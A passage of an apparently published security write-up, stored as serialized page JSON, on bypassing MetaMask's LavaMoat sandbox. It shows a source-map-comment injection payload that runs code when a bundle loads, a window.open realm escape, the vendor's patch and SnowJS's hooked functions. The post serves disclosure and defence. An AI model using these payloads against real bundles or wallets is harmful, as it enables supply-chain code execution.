(!converter) throw new Error('Unable to find original inlined sourcemap')\n",{"type":27,"tag":207,"props":55941,"children":55942},{"class":209,"line":296},[55943,55947,55952,55956,55960,55964,55968,55972,55977],{"type":27,"tag":207,"props":55944,"children":55945},{"style":214},[55946],{"type":33,"value":2333},{"type":27,"tag":207,"props":55948,"children":55949},{"style":220},[55950],{"type":33,"value":55951}," maps",{"type":27,"tag":207,"props":55953,"children":55954},{"style":226},[55955],{"type":33,"value":229},{"type":27,"tag":207,"props":55957,"children":55958},{"style":220},[55959],{"type":33,"value":55901},{"type":27,"tag":207,"props":55961,"children":55962},{"style":226},[55963],{"type":33,"value":21461},{"type":27,"tag":207,"props":55965,"children":55966},{"style":220},[55967],{"type":33,"value":55901},{"type":27,"tag":207,"props":55969,"children":55970},{"style":238},[55971],{"type":33,"value":1041},{"type":27,"tag":207,"props":55973,"children":55974},{"style":1335},[55975],{"type":33,"value":55976},"toObject",{"type":27,"tag":207,"props":55978,"children":55979},{"style":238},[55980],{"type":33,"value":15018},{"type":27,"tag":207,"props":55982,"children":55983},{"class":209,"line":445},[55984,55988,55993,55997,56001,56005,56010,56014,56018],{"type":27,"tag":207,"props":55985,"children":55986},{"style":214},[55987],{"type":33,"value":2333},{"type":27,"tag":207,"props":55989,"children":55990},{"style":220},[55991],{"type":33,"value":55992}," code",{"type":27,"tag":207,"props":55994,"children":55995},{"style":226},[55996],{"type":33,"value":229},{"type":27,"tag":207,"props":55998,"children":55999},{"style":220},[56000],{"type":33,"value":55910},{"type":27,"tag":207,"props":56002,"children":56003},{"style":238},[56004],{"type":33,"value":1041},{"type":27,"tag":207,"props":56006,"children":56007},{"style":1335},[56008],{"type":33,"value":56009},"removeComments",{"type":27,"tag":207,"props":56011,"children":56012},{"style":238},[56013],{"type":33,"value":1343},{"type":27,"tag":207,"props":56015,"children":56016},{"style":220},[56017],{"type":33,"value":45261},{"type":27,"tag":207,"props":56019,"children":56020},{"style":238},[56021],{"type":33,"value":10449},{"type":27,"tag":207,"props":56023,"children":56024},{"class":209,"line":867},[56025,56029,56033,56037,56041,56046],{"type":27,"tag":207,"props":56026,"children":56027},{"style":376},[56028],{"type":33,"value":46444},{"type":27,"tag":207,"props":56030,"children":56031},{"style":238},[56032],{"type":33,"value":16862},{"type":27,"tag":207,"props":56034,"children":56035},{"style":220},[56036],{"type":33,"value":84},{"type":27,"tag":207,"props":56038,"children":56039},{"style":238},[56040],{"type":33,"value":1123},{"type":27,"tag":207,"props":56042,"children":56043},{"style":220},[56044],{"type":33,"value":56045},"maps",{"type":27,"tag":207,"props":56047,"children":56048},{"style":238},[56049],{"type":33,"value":16872},{"type":27,"tag":207,"props":56051,"children":56052},{"class":209,"line":892},[56053],{"type":27,"tag":207,"props":56054,"children":56055},{"style":238},[56056],{"type":33,"value":451},{"type":27,"tag":36,"props":56058,"children":56059},{},[56060,56062,56067,56069,56074],{"type":33,"value":56061},"This code removes the source map comments of the source code, meaning that there actually is a modification of source code in Lavapack after the ",{"type":27,"tag":84,"props":56063,"children":56065},{"className":56064},[],[56066],{"type":33,"value":55506},{"type":33,"value":56068}," stage. Reviewing the ",{"type":27,"tag":84,"props":56070,"children":56072},{"className":56071},[],[56073],{"type":33,"value":55856},{"type":33,"value":56075}," code, we can see exactly how this happens.",{"type":27,"tag":101,"props":56077,"children":56079},{"className":201,"code":56078,"language":200,"meta":7,"style":7},"Object.defineProperty(exports, 'commentRegex', {\n get: function getCommentRegex () {\n // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n return /^\\s*?\\/[\\/\\*][@#]\\s+?sourceMappingURL=data:(((?:application|text)\\/json)(?:;charset=([^;,]+?)?)?)?(?:;(base64))?,(.*?)$/mg;\n }\n});\n\nexports.removeComments = function (src) {\n return src.replace(exports.commentRegex, '');\n};\n",[56080],{"type":27,"tag":84,"props":56081,"children":56082},{"__ignoreMap":7},[56083,56121,56147,56155,56369,56376,56383,56390,56425,56475],{"type":27,"tag":207,"props":56084,"children":56085},{"class":209,"line":210},[56086,56090,56094,56099,56103,56107,56111,56116],{"type":27,"tag":207,"props":56087,"children":56088},{"style":220},[56089],{"type":33,"value":9262},{"type":27,"tag":207,"props":56091,"children":56092},{"style":238},[56093],{"type":33,"value":1041},{"type":27,"tag":207,"props":56095,"children":56096},{"style":1335},[56097],{"type":33,"value":56098},"defineProperty",{"type":27,"tag":207,"props":56100,"children":56101},{"style":238},[56102],{"type":33,"value":1343},{"type":27,"tag":207,"props":56104,"children":56105},{"style":8920},[56106],{"type":33,"value":2041},{"type":27,"tag":207,"props":56108,"children":56109},{"style":238},[56110],{"type":33,"value":1123},{"type":27,"tag":207,"props":56112,"children":56113},{"style":1325},[56114],{"type":33,"value":56115},"'commentRegex'",{"type":27,"tag":207,"props":56117,"children":56118},{"style":238},[56119],{"type":33,"value":56120},", {\n",{"type":27,"tag":207,"props":56122,"children":56123},{"class":209,"line":244},[56124,56129,56133,56137,56142],{"type":27,"tag":207,"props":56125,"children":56126},{"style":1335},[56127],{"type":33,"value":56128}," get",{"type":27,"tag":207,"props":56130,"children":56131},{"style":220},[56132],{"type":33,"value":736},{"type":27,"tag":207,"props":56134,"children":56135},{"style":214},[56136],{"type":33,"value":45461},{"type":27,"tag":207,"props":56138,"children":56139},{"style":1335},[56140],{"type":33,"value":56141}," getCommentRegex",{"type":27,"tag":207,"props":56143,"children":56144},{"style":238},[56145],{"type":33,"value":56146}," () {\n",{"type":27,"tag":207,"props":56148,"children":56149},{"class":209,"line":270},[56150],{"type":27,"tag":207,"props":56151,"children":56152},{"style":4647},[56153],{"type":33,"value":56154}," // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n",{"type":27,"tag":207,"props":56156,"children":56157},{"class":209,"line":296},[56158,56162,56168,56173,56178,56183,56187,56192,56197,56202,56206,56210,56215,56220,56225,56230,56234,56238,56242,56247,56251,56256,56261,56266,56271,56275,56279,56283,56287,56291,56295,56299,56303,56308,56313,56317,56322,56327,56331,56335,56339,56343,56348,56352,56356,56360,56365],{"type":27,"tag":207,"props":56159,"children":56160},{"style":376},[56161],{"type":33,"value":8986},{"type":27,"tag":207,"props":56163,"children":56165},{"style":56164},"--shiki-default:#D16969",[56166],{"type":33,"value":56167}," /",{"type":27,"tag":207,"props":56169,"children":56170},{"style":1335},[56171],{"type":33,"value":56172},"^",{"type":27,"tag":207,"props":56174,"children":56175},{"style":56164},[56176],{"type":33,"value":56177},"\\s",{"type":27,"tag":207,"props":56179,"children":56180},{"style":55613},[56181],{"type":33,"value":56182},"*?\\/",{"type":27,"tag":207,"props":56184,"children":56185},{"style":1325},[56186],{"type":33,"value":11019},{"type":27,"tag":207,"props":56188,"children":56189},{"style":55613},[56190],{"type":33,"value":56191},"\\/\\*",{"type":27,"tag":207,"props":56193,"children":56194},{"style":1325},[56195],{"type":33,"value":56196},"][",{"type":27,"tag":207,"props":56198,"children":56199},{"style":56164},[56200],{"type":33,"value":56201},"@#",{"type":27,"tag":207,"props":56203,"children":56204},{"style":1325},[56205],{"type":33,"value":22686},{"type":27,"tag":207,"props":56207,"children":56208},{"style":56164},[56209],{"type":33,"value":56177},{"type":27,"tag":207,"props":56211,"children":56212},{"style":55613},[56213],{"type":33,"value":56214},"+?",{"type":27,"tag":207,"props":56216,"children":56217},{"style":56164},[56218],{"type":33,"value":56219},"sourceMappingURL=data:",{"type":27,"tag":207,"props":56221,"children":56222},{"style":1325},[56223],{"type":33,"value":56224},"(((?:",{"type":27,"tag":207,"props":56226,"children":56227},{"style":56164},[56228],{"type":33,"value":56229},"application",{"type":27,"tag":207,"props":56231,"children":56232},{"style":1335},[56233],{"type":33,"value":17693},{"type":27,"tag":207,"props":56235,"children":56236},{"style":56164},[56237],{"type":33,"value":33},{"type":27,"tag":207,"props":56239,"children":56240},{"style":1325},[56241],{"type":33,"value":10416},{"type":27,"tag":207,"props":56243,"children":56244},{"style":55613},[56245],{"type":33,"value":56246},"\\/",{"type":27,"tag":207,"props":56248,"children":56249},{"style":56164},[56250],{"type":33,"value":41253},{"type":27,"tag":207,"props":56252,"children":56253},{"style":1325},[56254],{"type":33,"value":56255},")(?:",{"type":27,"tag":207,"props":56257,"children":56258},{"style":56164},[56259],{"type":33,"value":56260},";charset=",{"type":27,"tag":207,"props":56262,"children":56263},{"style":1325},[56264],{"type":33,"value":56265},"([^",{"type":27,"tag":207,"props":56267,"children":56268},{"style":56164},[56269],{"type":33,"value":56270},";,",{"type":27,"tag":207,"props":56272,"children":56273},{"style":1325},[56274],{"type":33,"value":22686},{"type":27,"tag":207,"props":56276,"children":56277},{"style":55613},[56278],{"type":33,"value":56214},{"type":27,"tag":207,"props":56280,"children":56281},{"style":1325},[56282],{"type":33,"value":10416},{"type":27,"tag":207,"props":56284,"children":56285},{"style":55613},[56286],{"type":33,"value":10444},{"type":27,"tag":207,"props":56288,"children":56289},{"style":1325},[56290],{"type":33,"value":10416},{"type":27,"tag":207,"props":56292,"children":56293},{"style":55613},[56294],{"type":33,"value":10444},{"type":27,"tag":207,"props":56296,"children":56297},{"style":1325},[56298],{"type":33,"value":10416},{"type":27,"tag":207,"props":56300,"children":56301},{"style":55613},[56302],{"type":33,"value":10444},{"type":27,"tag":207,"props":56304,"children":56305},{"style":1325},[56306],{"type":33,"value":56307},"(?:",{"type":27,"tag":207,"props":56309,"children":56310},{"style":56164},[56311],{"type":33,"value":56312},";",{"type":27,"tag":207,"props":56314,"children":56315},{"style":1325},[56316],{"type":33,"value":1343},{"type":27,"tag":207,"props":56318,"children":56319},{"style":56164},[56320],{"type":33,"value":56321},"base64",{"type":27,"tag":207,"props":56323,"children":56324},{"style":1325},[56325],{"type":33,"value":56326},"))",{"type":27,"tag":207,"props":56328,"children":56329},{"style":55613},[56330],{"type":33,"value":10444},{"type":27,"tag":207,"props":56332,"children":56333},{"style":56164},[56334],{"type":33,"value":11407},{"type":27,"tag":207,"props":56336,"children":56337},{"style":1325},[56338],{"type":33,"value":1343},{"type":27,"tag":207,"props":56340,"children":56341},{"style":56164},[56342],{"type":33,"value":1041},{"type":27,"tag":207,"props":56344,"children":56345},{"style":55613},[56346],{"type":33,"value":56347},"*?",{"type":27,"tag":207,"props":56349,"children":56350},{"style":1325},[56351],{"type":33,"value":10416},{"type":27,"tag":207,"props":56353,"children":56354},{"style":1335},[56355],{"type":33,"value":17565},{"type":27,"tag":207,"props":56357,"children":56358},{"style":56164},[56359],{"type":33,"value":980},{"type":27,"tag":207,"props":56361,"children":56362},{"style":214},[56363],{"type":33,"value":56364},"mg",{"type":27,"tag":207,"props":56366,"children":56367},{"style":238},[56368],{"type":33,"value":241},{"type":27,"tag":207,"props":56370,"children":56371},{"class":209,"line":445},[56372],{"type":27,"tag":207,"props":56373,"children":56374},{"style":238},[56375],{"type":33,"value":5312},{"type":27,"tag":207,"props":56377,"children":56378},{"class":209,"line":867},[56379],{"type":27,"tag":207,"props":56380,"children":56381},{"style":238},[56382],{"type":33,"value":42591},{"type":27,"tag":207,"props":56384,"children":56385},{"class":209,"line":892},[56386],{"type":27,"tag":207,"props":56387,"children":56388},{"emptyLinePlaceholder":19},[56389],{"type":33,"value":2062},{"type":27,"tag":207,"props":56391,"children":56392},{"class":209,"line":1475},[56393,56397,56401,56405,56409,56413,56417,56421],{"type":27,"tag":207,"props":56394,"children":56395},{"style":8920},[56396],{"type":33,"value":2041},{"type":27,"tag":207,"props":56398,"children":56399},{"style":238},[56400],{"type":33,"value":1041},{"type":27,"tag":207,"props":56402,"children":56403},{"style":1335},[56404],{"type":33,"value":56009},{"type":27,"tag":207,"props":56406,"children":56407},{"style":226},[56408],{"type":33,"value":229},{"type":27,"tag":207,"props":56410,"children":56411},{"style":214},[56412],{"type":33,"value":45461},{"type":27,"tag":207,"props":56414,"children":56415},{"style":238},[56416],{"type":33,"value":686},{"type":27,"tag":207,"props":56418,"children":56419},{"style":220},[56420],{"type":33,"value":39927},{"type":27,"tag":207,"props":56422,"children":56423},{"style":238},[56424],{"type":33,"value":1424},{"type":27,"tag":207,"props":56426,"children":56427},{"class":209,"line":2065},[56428,56432,56436,56440,56445,56449,56453,56457,56462,56466,56471],{"type":27,"tag":207,"props":56429,"children":56430},{"style":376},[56431],{"type":33,"value":46444},{"type":27,"tag":207,"props":56433,"children":56434},{"style":220},[56435],{"type":33,"value":55601},{"type":27,"tag":207,"props":56437,"children":56438},{"style":238},[56439],{"type":33,"value":1041},{"type":27,"tag":207,"props":56441,"children":56442},{"style":1335},[56443],{"type":33,"value":56444},"replace",{"type":27,"tag":207,"props":56446,"children":56447},{"style":238},[56448],{"type":33,"value":1343},{"type":27,"tag":207,"props":56450,"children":56451},{"style":8920},[56452],{"type":33,"value":2041},{"type":27,"tag":207,"props":56454,"children":56455},{"style":238},[56456],{"type":33,"value":1041},{"type":27,"tag":207,"props":56458,"children":56459},{"style":220},[56460],{"type":33,"value":56461},"commentRegex",{"type":27,"tag":207,"props":56463,"children":56464},{"style":238},[56465],{"type":33,"value":1123},{"type":27,"tag":207,"props":56467,"children":56468},{"style":1325},[56469],{"type":33,"value":56470},"''",{"type":27,"tag":207,"props":56472,"children":56473},{"style":238},[56474],{"type":33,"value":1455},{"type":27,"tag":207,"props":56476,"children":56477},{"class":209,"line":2092},[56478],{"type":27,"tag":207,"props":56479,"children":56480},{"style":238},[56481],{"type":33,"value":23852},{"type":27,"tag":36,"props":56483,"children":56484},{},[56485,56487,56493],{"type":33,"value":56486},"Looking deeper at the RegEx, it matches the start of the multiple line comment (",{"type":27,"tag":84,"props":56488,"children":56490},{"className":56489},[],[56491],{"type":33,"value":56492},"/*",{"type":33,"value":56494},") but doesn't match the end of it, meaning that the syntax would break in the case of multiline source map comments.",{"type":27,"tag":58,"props":56496,"children":56498},{"id":56497},"the-bypass",[56499],{"type":33,"value":56500},"The Bypass",{"type":27,"tag":36,"props":56502,"children":56503},{},[56504,56506,56511,56513,56518],{"type":33,"value":56505},"By abusing the ",{"type":27,"tag":84,"props":56507,"children":56509},{"className":56508},[],[56510],{"type":33,"value":56009},{"type":33,"value":56512}," function, we could bypass the Lavamoat restrictions by escaping the ",{"type":27,"tag":84,"props":56514,"children":56516},{"className":56515},[],[56517],{"type":33,"value":55355},{"type":33,"value":56519}," sandbox. To do so, we created a multiline source map comment, and injected the invalid javascript inside the comment:",{"type":27,"tag":101,"props":56521,"children":56523},{"className":201,"code":56522,"language":200,"meta":7,"style":7},"/*# sourceMappingURL=data:,{}\n\n}}}}\n}, {\n package: \"xpl\",\n file: \"node_modules/xpl/index.js\",\n test: alert(document.domain),\n test1: () => { () => { () => { () => {\n\n/*\n*/\n",[56524],{"type":27,"tag":84,"props":56525,"children":56526},{"__ignoreMap":7},[56527,56535,56542,56550,56558,56566,56574,56582,56590,56597,56605],{"type":27,"tag":207,"props":56528,"children":56529},{"class":209,"line":210},[56530],{"type":27,"tag":207,"props":56531,"children":56532},{"style":4647},[56533],{"type":33,"value":56534},"/*# sourceMappingURL=data:,{}\n",{"type":27,"tag":207,"props":56536,"children":56537},{"class":209,"line":244},[56538],{"type":27,"tag":207,"props":56539,"children":56540},{"emptyLinePlaceholder":19},[56541],{"type":33,"value":2062},{"type":27,"tag":207,"props":56543,"children":56544},{"class":209,"line":270},[56545],{"type":27,"tag":207,"props":56546,"children":56547},{"style":4647},[56548],{"type":33,"value":56549},"}}}}\n",{"type":27,"tag":207,"props":56551,"children":56552},{"class":209,"line":296},[56553],{"type":27,"tag":207,"props":56554,"children":56555},{"style":4647},[56556],{"type":33,"value":56557},"}, {\n",{"type":27,"tag":207,"props":56559,"children":56560},{"class":209,"line":445},[56561],{"type":27,"tag":207,"props":56562,"children":56563},{"style":4647},[56564],{"type":33,"value":56565}," package: \"xpl\",\n",{"type":27,"tag":207,"props":56567,"children":56568},{"class":209,"line":867},[56569],{"type":27,"tag":207,"props":56570,"children":56571},{"style":4647},[56572],{"type":33,"value":56573}," file: \"node_modules/xpl/index.js\",\n",{"type":27,"tag":207,"props":56575,"children":56576},{"class":209,"line":892},[56577],{"type":27,"tag":207,"props":56578,"children":56579},{"style":4647},[56580],{"type":33,"value":56581}," test: alert(document.domain),\n",{"type":27,"tag":207,"props":56583,"children":56584},{"class":209,"line":1475},[56585],{"type":27,"tag":207,"props":56586,"children":56587},{"style":4647},[56588],{"type":33,"value":56589}," test1: () => { () => { () => { () => {\n",{"type":27,"tag":207,"props":56591,"children":56592},{"class":209,"line":2065},[56593],{"type":27,"tag":207,"props":56594,"children":56595},{"emptyLinePlaceholder":19},[56596],{"type":33,"value":2062},{"type":27,"tag":207,"props":56598,"children":56599},{"class":209,"line":2092},[56600],{"type":27,"tag":207,"props":56601,"children":56602},{"style":4647},[56603],{"type":33,"value":56604},"/*\n",{"type":27,"tag":207,"props":56606,"children":56607},{"class":209,"line":2130},[56608],{"type":27,"tag":207,"props":56609,"children":56610},{"style":4647},[56611],{"type":33,"value":56612},"*/\n",{"type":27,"tag":36,"props":56614,"children":56615},{},[56616],{"type":33,"value":56617},"This allows malicious code to execute without breaking any other package or feature. This payload also makes the supply chain attack more impactful. Any injected code is executed as soon as the bundle file is imported.",{"type":27,"tag":58,"props":56619,"children":56621},{"id":56620},"lavapack-patch",[56622],{"type":33,"value":56623},"Lavapack Patch",{"type":27,"tag":36,"props":56625,"children":56626},{},[56627,56629,56635],{"type":33,"value":56628},"Metamask mitigated the issues we reported on Lavapack by defining ",{"type":27,"tag":84,"props":56630,"children":56632},{"className":56631},[],[56633],{"type":33,"value":56634},"assertValidJS",{"type":33,"value":56636},", an independent check that differs from the browserify syntax check we used to exploit the issue.",{"type":27,"tag":36,"props":56638,"children":56639},{},[56640,56642,56649],{"type":33,"value":56641},"The patch was introduced in commit ",{"type":27,"tag":47,"props":56643,"children":56646},{"href":56644,"rel":56645},"https://github.com/LavaMoat/LavaMoat/commit/9c38cd47e7875dde53349dd34971c74ce34004d9",[51],[56647],{"type":33,"value":56648},"9c38cd4",{"type":33,"value":1041},{"type":27,"tag":101,"props":56651,"children":56653},{"className":47605,"code":56652,"language":47607,"meta":7,"style":7},"+ function assertValidJS(code) {\n+ try {\n+ new Function(code)\n+ } catch (err) {\n+ throw new Error(`Invalid JavaScript: ${err.message}`)\n+ }\n+ }\n\n+ // additional layer of syntax checking independent of browserify\n+ assertValidJS(sourceMeta.code) \n\n",[56654],{"type":27,"tag":84,"props":56655,"children":56656},{"__ignoreMap":7},[56657,56665,56673,56681,56689,56697,56705,56713,56720,56728],{"type":27,"tag":207,"props":56658,"children":56659},{"class":209,"line":210},[56660],{"type":27,"tag":207,"props":56661,"children":56662},{"style":232},[56663],{"type":33,"value":56664},"+ function assertValidJS(code) {\n",{"type":27,"tag":207,"props":56666,"children":56667},{"class":209,"line":244},[56668],{"type":27,"tag":207,"props":56669,"children":56670},{"style":232},[56671],{"type":33,"value":56672},"+ try {\n",{"type":27,"tag":207,"props":56674,"children":56675},{"class":209,"line":270},[56676],{"type":27,"tag":207,"props":56677,"children":56678},{"style":232},[56679],{"type":33,"value":56680},"+ new Function(code)\n",{"type":27,"tag":207,"props":56682,"children":56683},{"class":209,"line":296},[56684],{"type":27,"tag":207,"props":56685,"children":56686},{"style":232},[56687],{"type":33,"value":56688},"+ } catch (err) {\n",{"type":27,"tag":207,"props":56690,"children":56691},{"class":209,"line":445},[56692],{"type":27,"tag":207,"props":56693,"children":56694},{"style":232},[56695],{"type":33,"value":56696},"+ throw new Error(`Invalid JavaScript: ${err.message}`)\n",{"type":27,"tag":207,"props":56698,"children":56699},{"class":209,"line":867},[56700],{"type":27,"tag":207,"props":56701,"children":56702},{"style":232},[56703],{"type":33,"value":56704},"+ }\n",{"type":27,"tag":207,"props":56706,"children":56707},{"class":209,"line":892},[56708],{"type":27,"tag":207,"props":56709,"children":56710},{"style":232},[56711],{"type":33,"value":56712},"+ }\n",{"type":27,"tag":207,"props":56714,"children":56715},{"class":209,"line":1475},[56716],{"type":27,"tag":207,"props":56717,"children":56718},{"emptyLinePlaceholder":19},[56719],{"type":33,"value":2062},{"type":27,"tag":207,"props":56721,"children":56722},{"class":209,"line":2065},[56723],{"type":27,"tag":207,"props":56724,"children":56725},{"style":232},[56726],{"type":33,"value":56727},"+ // additional layer of syntax checking independent of browserify\n",{"type":27,"tag":207,"props":56729,"children":56730},{"class":209,"line":2092},[56731],{"type":27,"tag":207,"props":56732,"children":56733},{"style":232},[56734],{"type":33,"value":56735},"+ assertValidJS(sourceMeta.code)\n",{"type":27,"tag":28,"props":56737,"children":56739},{"id":56738},"hacking-js-realms",[56740],{"type":33,"value":56741},"Hacking JS Realms",{"type":27,"tag":36,"props":56743,"children":56744},{},[56745,56747,56752],{"type":33,"value":56746},"Lavamoat scuttling removes unnecessary and dangerous attributes from the ",{"type":27,"tag":84,"props":56748,"children":56750},{"className":56749},[],[56751],{"type":33,"value":44667},{"type":33,"value":56753}," object. However, this can be easily bypassed when Lavamoat is running in a browser context.",{"type":27,"tag":101,"props":56755,"children":56757},{"className":201,"code":56756,"language":200,"meta":7,"style":7},"const w = window.open('/non_existent');\nw.alert(document.domain)\n",[56758],{"type":27,"tag":84,"props":56759,"children":56760},{"__ignoreMap":7},[56761,56803],{"type":27,"tag":207,"props":56762,"children":56763},{"class":209,"line":210},[56764,56768,56773,56777,56781,56785,56790,56794,56799],{"type":27,"tag":207,"props":56765,"children":56766},{"style":214},[56767],{"type":33,"value":16931},{"type":27,"tag":207,"props":56769,"children":56770},{"style":220},[56771],{"type":33,"value":56772}," w",{"type":27,"tag":207,"props":56774,"children":56775},{"style":226},[56776],{"type":33,"value":229},{"type":27,"tag":207,"props":56778,"children":56779},{"style":220},[56780],{"type":33,"value":38668},{"type":27,"tag":207,"props":56782,"children":56783},{"style":238},[56784],{"type":33,"value":1041},{"type":27,"tag":207,"props":56786,"children":56787},{"style":1335},[56788],{"type":33,"value":56789},"open",{"type":27,"tag":207,"props":56791,"children":56792},{"style":238},[56793],{"type":33,"value":1343},{"type":27,"tag":207,"props":56795,"children":56796},{"style":1325},[56797],{"type":33,"value":56798},"'/non_existent'",{"type":27,"tag":207,"props":56800,"children":56801},{"style":238},[56802],{"type":33,"value":1455},{"type":27,"tag":207,"props":56804,"children":56805},{"class":209,"line":244},[56806,56811,56815,56819,56823,56827,56831,56835],{"type":27,"tag":207,"props":56807,"children":56808},{"style":220},[56809],{"type":33,"value":56810},"w",{"type":27,"tag":207,"props":56812,"children":56813},{"style":238},[56814],{"type":33,"value":1041},{"type":27,"tag":207,"props":56816,"children":56817},{"style":1335},[56818],{"type":33,"value":39955},{"type":27,"tag":207,"props":56820,"children":56821},{"style":238},[56822],{"type":33,"value":1343},{"type":27,"tag":207,"props":56824,"children":56825},{"style":220},[56826],{"type":33,"value":39965},{"type":27,"tag":207,"props":56828,"children":56829},{"style":238},[56830],{"type":33,"value":1041},{"type":27,"tag":207,"props":56832,"children":56833},{"style":220},[56834],{"type":33,"value":39975},{"type":27,"tag":207,"props":56836,"children":56837},{"style":238},[56838],{"type":33,"value":10449},{"type":27,"tag":36,"props":56840,"children":56841},{},[56842,56844,56849],{"type":33,"value":56843},"This opens a new window with a new JS Realm (another ",{"type":27,"tag":84,"props":56845,"children":56847},{"className":56846},[],[56848],{"type":33,"value":44667},{"type":33,"value":56850}," object), and uses it to execute code in the context of the scuttled window. Note that the window needs to be same-origin and must not be scuttled.",{"type":27,"tag":36,"props":56852,"children":56853},{},[56854,56856,56863],{"type":33,"value":56855},"As a mitigation, some applications integrate SnowJS with scuttling, so every new same-origin window and iframe will be detected and scuttled (check the ",{"type":27,"tag":47,"props":56857,"children":56860},{"href":56858,"rel":56859},"https://github.com/MetaMask/metamask-extension/blob/3996f505a6a156d96077acb49579e6fc9e78cd45/app/scripts/use-snow.js#L22",[51],[56861],{"type":33,"value":56862},"Metamask implementation",{"type":33,"value":10416},{"type":27,"tag":58,"props":56865,"children":56867},{"id":56866},"snowjs-attack-surface",[56868],{"type":33,"value":56869},"SnowJS Attack Surface",{"type":27,"tag":36,"props":56871,"children":56872},{},[56873],{"type":33,"value":56874},"SnowJS is a javascript sandbox implementation that secures same-origin realms in browser applications. It is configured to detect new realms and attach them to the sandbox.",{"type":27,"tag":36,"props":56876,"children":56877},{},[56878,56880,56887],{"type":33,"value":56879},"As a mechanism, it hooks functions that can be used to create realms (an iframe, for example). For example, here are some of the ",{"type":27,"tag":47,"props":56881,"children":56884},{"href":56882,"rel":56883},"https://github.com/LavaMoat/snow/blob/ecf1add05c774b90b8baeff934b2e40585e13ca4/src/inserters.js#L9",[51],[56885],{"type":33,"value":56886},"hooked inserters",{"type":33,"value":56888}," functions:",{"type":27,"tag":101,"props":56890,"children":56892},{"className":201,"code":56891,"language":200,"meta":7,"style":7},"const map = {\n Range: ['insertNode'],\n DocumentFragment: ['replaceChildren', 'append', 'prepend'],\n Document: ['replaceChildren', 'append', 'prepend', 'write', 'writeln'],\n Node: ['appendChild', 'insertBefore', 'replaceChild'],\n Element: ['innerHTML', 'outerHTML', 'insertAdjacentHTML', 'replaceWith', 'insertAdjacentElement', 'append', 'before', 'prepend', 'after', 'replaceChildren'],\n ShadowRoot: ['innerHTML'],\n HTMLIFrameElement: ['srcdoc'],\n};\n",[56893],{"type":27,"tag":84,"props":56894,"children":56895},{"__ignoreMap":7},[56896,56916,56937,56976,57030,57069,57168,57188,57209],{"type":27,"tag":207,"props":56897,"children":56898},{"class":209,"line":210},[56899,56903,56908,56912],{"type":27,"tag":207,"props":56900,"children":56901},{"style":214},[56902],{"type":33,"value":16931},{"type":27,"tag":207,"props":56904,"children":56905},{"style":220},[56906],{"type":33,"value":56907}," map",{"type":27,"tag":207,"props":56909,"children":56910},{"style":226},[56911],{"type":33,"value":229},{"type":27,"tag":207,"props":56913,"children":56914},{"style":238},[56915],{"type":33,"value":384},{"type":27,"tag":207,"props":56917,"children":56918},{"class":209,"line":244},[56919,56924,56928,56933],{"type":27,"tag":207,"props":56920,"children":56921},{"style":220},[56922],{"type":33,"value":56923}," Range:",{"type":27,"tag":207,"props":56925,"children":56926},{"style":238},[56927],{"type":33,"value":30305},{"type":27,"tag":207,"props":56929,"children":56930},{"style":1325},[56931],{"type":33,"value":56932},"'insertNode'",{"type":27,"tag":207,"props":56934,"children":56935},{"style":238},[56936],{"type":33,"value":21539},{"type":27,"tag":207,"props":56938,"children":56939},{"class":209,"line":270},[56940,56945,56949,56954,56958,56963,56967,56972],{"type":27,"tag":207,"props":56941,"children":56942},{"style":220},[56943],{"type":33,"value":56944}," DocumentFragment:",{"type":27,"tag":207,"props":56946,"children":56947},{"style":238},[56948],{"type":33,"value":30305},{"type":27,"tag":207,"props":56950,"children":56951},{"style":1325},[56952],{"type":33,"value":56953},"'replaceChildren'",{"type":27,"tag":207,"props":56955,"children":56956},{"style":238},[56957],{"type":33,"value":1123},{"type":27,"tag":207,"props":56959,"children":56960},{"style":1325},[56961],{"type":33,"value":56962},"'append'",{"type":27,"tag":207,"props":56964,"children":56965},{"style":238},[56966],{"type":33,"value":1123},{"type":27,"tag":207,"props":56968,"children":56969},{"style":1325},[56970],{"type":33,"value":56971},"'prepend'",{"type":27,"tag":207,"props":56973,"children":56974},{"style":238},[56975],{"type":33,"value":21539},{"type":27,"tag":207,"props":56977,"children":56978},{"class":209,"line":296},[56979,56984,56988,56992,56996,57000,57004,57008,57012,57017,57021,57026],{"type":27,"tag":207,"props":56980,"children":56981},{"style":220},[56982],{"type":33,"value":56983}," Document:",{"type":27,"tag":207,"props":56985,"children":56986},{"style":238},[56987],{"type":33,"value":30305},{"type":27,"tag":207,"props":56989,"children":56990},{"style":1325},[56991],{"type":33,"value":56953},{"type":27,"tag":207,"props":56993,"children":56994},{"style":238},[56995],{"type":33,"value":1123},{"type":27,"tag":207,"props":56997,"children":56998},{"style":1325},[56999],{"type":33,"value":56962},{"type":27,"tag":207,"props":57001,"children":57002},{"style":238},[57003],{"type":33,"value":1123},{"type":27,"tag":207,"props":57005,"children":57006},{"style":1325},[57007],{"type":33,"value":56971},{"type":27,"tag":207,"props":57009,"children":57010},{"style":238},[57011],{"type":33,"value":1123},{"type":27,"tag":207,"props":57013,"children":57014},{"style":1325},[57015],{"type":33,"value":57016},"'write'",{"type":27,"tag":207,"props":57018,"children":57019},{"style":238},[57020],{"type":33,"value":1123},{"type":27,"tag":207,"props":57022,"children":57023},{"style":1325},[57024],{"type":33,"value":57025},"'writeln'",{"type":27,"tag":207,"props":57027,"children":57028},{"style":238},[57029],{"type":33,"value":21539},{"type":27,"tag":207,"props":57031,"children":57032},{"class":209,"line":445},[57033,57038,57042,57047,57051,57056,57060,57065],{"type":27,"tag":207,"props":57034,"children":57035},{"style":220},[57036],{"type":33,"value":57037}," Node:",{"type":27,"tag":207,"props":57039,"children":57040},{"style":238},[57041],{"type":33,"value":30305},{"type":27,"tag":207,"props":57043,"children":57044},{"style":1325},[57045],{"type":33,"value":57046},"'appendChild'",{"type":27,"tag":207,"props":57048,"children":57049},{"style":238},[57050],{"type":33,"value":1123},{"type":27,"tag":207,"props":57052,"children":57053},{"style":1325},[57054],{"type":33,"value":57055},"'insertBefore'",{"type":27,"tag":207,"props":57057,"children":57058},{"style":238},[57059],{"type":33,"value":1123},{"type":27,"tag":207,"props":57061,"children":57062},{"style":1325},[57063],{"type":33,"value":57064},"'replaceChild'",{"type":27,"tag":207,"props":57066,"children":57067},{"style":238},[57068],{"type":33,"value":21539},{"type":27,"tag":207,"props":57070,"children":57071},{"class":209,"line":867},[57072,57077,57081,57086,57090,57095,57099,57104,57108,57113,57117,57122,57126,57130,57134,57139,57143,57147,57151,57156,57160,57164],{"type":27,"tag":207,"props":57073,"children":57074},{"style":220},[57075],{"type":33,"value":57076}," 